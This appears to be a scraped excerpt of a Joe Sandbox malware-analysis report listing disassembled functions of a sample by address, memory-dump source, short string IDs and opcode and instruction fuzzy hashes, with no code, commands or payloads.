                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                          • API String ID: 0-261129489
                                                                                                                                                                                                                                                                          • Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                                                          • Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796
                                                                                                                                                                                                                                                                          Function 00B0B763 Relevance: 5.5, Strings: 4, Instructions: 519COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                          • API String ID: 0-261129489
                                                                                                                                                                                                                                                                          • Opcode ID: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                                                          • Instruction ID: 398dfe8dda49fb3b5fb37800eaea31f98596259c21def15db7045e355c558621
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3E1B27151C3C18AE775CF298460BBABFD6EFD2304F1888ADC1C987292DB39454ACB12
                                                                                                                                                                                                                                                                          Function 0042B4FC Relevance: 5.5, Strings: 4, Instructions: 519COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                          • API String ID: 0-261129489
                                                                                                                                                                                                                                                                          • Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                                                          • Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56
                                                                                                                                                                                                                                                                          Function 00418578 Relevance: 5.5, Strings: 4, Instructions: 455COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: "w+y$?TUV$D@YO$^QRW
                                                                                                                                                                                                                                                                          • API String ID: 0-2418547040
                                                                                                                                                                                                                                                                          • Opcode ID: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
                                                                                                                                                                                                                                                                          • Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44
                                                                                                                                                                                                                                                                          Function 00431839 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: MetricsSystem
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                                          • Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                                                          • Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96
                                                                                                                                                                                                                                                                          Function 00AED25A Relevance: 5.3, Strings: 4, Instructions: 291COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: BI$ZG$3ej$pr
                                                                                                                                                                                                                                                                          • API String ID: 0-483502859
                                                                                                                                                                                                                                                                          • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                          • Instruction ID: 9635682069ee79f206f4013d95d7a47751280732f6dbfeae21b82abebed8c0c9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBA1A3B52417818FD728CF2AC590A62BBF2FF96304B1995ADC4D68F766D734E802CB10
                                                                                                                                                                                                                                                                          Function 0040CFF3 Relevance: 5.3, Strings: 4, Instructions: 291COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: BI$ZG$3ej$pr
                                                                                                                                                                                                                                                                          • API String ID: 0-483502859
                                                                                                                                                                                                                                                                          • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                          • Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54
                                                                                                                                                                                                                                                                          Function 00426054 Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 67$V3R5$dB
                                                                                                                                                                                                                                                                          • API String ID: 0-2543814982
                                                                                                                                                                                                                                                                          • Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                                                          • Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A
                                                                                                                                                                                                                                                                          Function 00AF87DF Relevance: 4.0, Strings: 3, Instructions: 234COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: "w+y$?TUV$DX8Z
                                                                                                                                                                                                                                                                          • API String ID: 0-3307990326
                                                                                                                                                                                                                                                                          • Opcode ID: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                                          • Instruction ID: abfedfa2bbedc5c721fbafaca20fb385d4746ca4cbd0c151d1375620e64d5606
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D81CD716007128FC728CF29C8D0A76B7F2FF95750B1A859DD9824FB65EB38A841CB45
                                                                                                                                                                                                                                                                          Function 00AF99D7 Relevance: 3.7, Strings: 2, Instructions: 1211COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                                                          • API String ID: 0-936430989
                                                                                                                                                                                                                                                                          • Opcode ID: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                                                          • Instruction ID: c2aa04677aee8c549b8ac01a6e679799d6d1dd699f35cc45ec8bad140cc2373a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A8215B46083449FD7249F64D880B7FBBE2EBD6714F28892CF68987291D771DC428B46
                                                                                                                                                                                                                                                                          Function 00419770 Relevance: 3.7, Strings: 2, Instructions: 1211COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-936430989
                                                                                                                                                                                                                                                                          • Opcode ID: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
                                                                                                                                                                                                                                                                          • Instruction ID: 1bde8819f6f7b7dbc416330df06e5e5b0ea208d0a860aecc15c429cbd1f7d48d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF8248746093405BD724CF24D890BAFBBE2EBC6714F28892DE4C547392D679DC92CB4A
                                                                                                                                                                                                                                                                          Function 00AEDF8C Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Uninitialize
                                                                                                                                                                                                                                                                          • String ID: PT
                                                                                                                                                                                                                                                                          • API String ID: 3861434553-4135314810
                                                                                                                                                                                                                                                                          • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                          • Instruction ID: f3456e58c02908ba8662abed7a8dabd66b0bd27e4b1ff690fe9f46581cf873cf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10A1BEB45087818FD726CF2AC4A0A62BFE1EF57300B19869CC5D24FB66D339D845CB15
                                                                                                                                                                                                                                                                          Function 0040DD25 Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Uninitialize
                                                                                                                                                                                                                                                                          • String ID: PT
                                                                                                                                                                                                                                                                          • API String ID: 3861434553-4135314810
                                                                                                                                                                                                                                                                          • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                          • Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55
                                                                                                                                                                                                                                                                          Function 00AEABA7 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: BE$de
                                                                                                                                                                                                                                                                          • API String ID: 0-1272349043
                                                                                                                                                                                                                                                                          • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                          • Instruction ID: eb1d46ded495cbadd10b033f01c66fa0177bd5374bd849fb464eb211cec17fbf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AD16B7165C3A48BC328DF2988516AFFBE2EFD2304F18492CE8D19B391D674D906C792
                                                                                                                                                                                                                                                                          Function 0040A940 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: BE$de
                                                                                                                                                                                                                                                                          • API String ID: 0-1272349043
                                                                                                                                                                                                                                                                          • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                          • Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787
                                                                                                                                                                                                                                                                          Function 00B1CD87 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: @$ihgf
                                                                                                                                                                                                                                                                          • API String ID: 0-73152791
                                                                                                                                                                                                                                                                          • Opcode ID: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                                          • Instruction ID: 5ae682e15e4e36b8f0a9335420db3584a1b70879926e1146c22c9a4c1d7bc73b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F4126B2A043018BD714CF24C8416BBBBE2FFD2318F54866CE4999B291E735E955CBC6
                                                                                                                                                                                                                                                                          Function 0043CB20 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: @$ihgf
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-73152791
                                                                                                                                                                                                                                                                          • Opcode ID: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                                                          • Instruction ID: cc847ee4b474d0efd8a0440ac8e8375c275344d67ffd0b73ceeb6cce142f8bff
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D413AB1A043018BD714CF24D89277BB7A1FFCA318F14952DD489AB391E739E915C78A
                                                                                                                                                                                                                                                                          Function 00AF554C Relevance: 2.6, Strings: 2, Instructions: 113COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: Z\$^P
                                                                                                                                                                                                                                                                          • API String ID: 0-3724859648
                                                                                                                                                                                                                                                                          • Opcode ID: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                                          • Instruction ID: 1c2abf2c6c170491ef691067d817a89e2fd056225651606d06962e5df91f2325
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4541C0B1911A00CFC718CF38C892A72B7B2FF59314B1A859CE5968F7A5E738E841CB55
                                                                                                                                                                                                                                                                          Function 0042750D Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: AzB$`rB
                                                                                                                                                                                                                                                                          • API String ID: 0-365317308
                                                                                                                                                                                                                                                                          • Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                                          • Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A
                                                                                                                                                                                                                                                                          Function 00427326 Relevance: 2.5, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: AzB$`rB
                                                                                                                                                                                                                                                                          • API String ID: 0-365317308
                                                                                                                                                                                                                                                                          • Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                                          • Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
